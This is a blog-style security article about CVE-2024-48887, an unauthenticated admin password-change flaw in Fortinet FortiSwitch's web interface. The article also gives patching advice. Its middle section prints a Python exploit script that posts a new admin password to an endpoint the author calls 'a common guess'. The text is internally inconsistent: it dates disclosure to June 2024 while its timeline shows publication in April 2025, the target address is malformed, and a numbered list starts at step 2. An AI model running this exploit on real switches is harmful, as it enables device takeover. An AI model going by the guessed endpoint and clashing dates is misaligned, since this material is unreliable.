CVE-2024-48887 - Unverified Password Change in Fortinet FortiSwitch Allows Attackers to Take Over Admin Accounts

---

Fortinet’s FortiSwitch is a widely used network switch in enterprise environments, trusted for performance and robust security. But in June 2024, a serious vulnerability—tracked as CVE-2024-48887—was disclosed. This flaw lets a remote attacker change admin passwords via the switch’s web interface, without any authentication. In this article, we’ll dig into what went wrong, how attackers exploit it, and how you can protect your network.

What is CVE-2024-48887?

CVE-2024-48887 is an *unauthenticated password change* bug found in the GUI (web interface) of Fortinet FortiSwitch, affecting multiple firmware versions. If exploited, anyone on the network (or with access to the management interface) can set a new password for admin or other local users—without knowing the existing password.

Fortinet’s advisory:
Fortinet PSIRT Advisory - FG-IR-24-110

Why is It Dangerous?

- No login required: Remote attackers can reset admin passwords from anywhere the web GUI is reachable.
- Complete takeover: Once the attacker changes the password, they gain full control, lock out legitimate administrators, and tamper with network settings.
- Potential for lateral movement: Attackers could access sensitive VLANs or pivot to other devices.

How Does the Vulnerability Work?

The password reset page in the FortiSwitch GUI doesn't properly check if the request comes from an authenticated, logged-in user. An attacker can forge a request (like a POST request) with a new password, and the switch will accept it—even if the attacker is not logged in.

Example Exploit Code

Below is a simplified Python snippet that performs the exploit. This is for educational and defensive purposes only.

Suppose your FortiSwitch management interface is at http://10...100.

import requests

TARGET = "http://10...100"
NEW_PASS = "PwnedbyCVE202448887"

payload = {
    "username": "admin",   # or any account
    "newPassword": NEW_PASS
}

# The vulnerable endpoint may vary, below is a common guess:
endpoint = "/api/v2/password/change"

resp = requests.post(
    TARGET + endpoint,
    data=payload,
    headers={
        "Content-Type": "application/x-www-form-urlencoded"
    }
)

if resp.status_code == 200:
    print("[+] Password changed successfully!")
else:
    print("[-] Exploit failed. Check target and endpoint.")

Note: The actual request format and endpoint may vary depending on firmware version and configuration. Always test in a lab, never on production systems without permission.

Attacker finds FortiSwitch web GUI exposed to the network or internet.

2. Sends a fake password change request (POST) using a tool like Burp Suite, curl, or a custom script.

Which Versions are Affected?

Check Fortinet’s advisory for the full list, but *all* unpatched FortiSwitch versions with the web GUI enabled may be vulnerable.

Update immediately. Fortinet has released patches—apply the latest firmware for your device.

- Download: Fortinet Support

Conclusion

CVE-2024-48887 is a textbook example of how a small oversight—forgetting to check if a user is logged in—can open the door to major compromises. If you run FortiSwitches, patch as soon as possible and review your management interface exposure.

Read more

- Fortinet PSIRT Advisory
- Product download/support

Stay safe, keep your firmware up to date, and never trust your networks to default configurations!

Timeline

Published on: 04/08/2025 17:15:34 UTC
Last modified on: 04/08/2025 18:13:53 UTC